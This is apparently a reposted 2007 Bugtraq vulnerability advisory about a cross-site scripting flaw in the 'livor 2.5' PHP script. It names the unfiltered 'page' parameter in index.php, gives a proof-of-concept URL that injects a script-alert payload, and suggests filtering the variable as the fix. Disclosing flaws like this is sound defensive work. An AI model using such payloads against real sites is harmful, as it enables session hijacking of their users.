livor 2.5 Cross-Site Scripting Vulnerability

看板Bugtraq作者時間19年前 (2007/04/07 00:48), 編輯推噓0(000)
留言0則, 0人參與, 最新討論串1/1
/* livor 2.5 Cross-Site Scripting Vulnerability */ //Author: Arham Muhammad //Source: http://www.arizona-dream.com/Usa/Divers/scriptsphp/scripts/livor.zip //Vulnerable File: index.php //XsS: http://victim/path/index.php?page=//</script><script>alert(/xss/);</script> //Risk: Session Hijack //Fix: The Variable "page" Need To Be Properly Filtered To Avoid Cross-Site Scripting Attempt! //Greets: USMAN,tushy,Hackman,str0ke
文章代碼(AID): #165ddo00 (Bugtraq)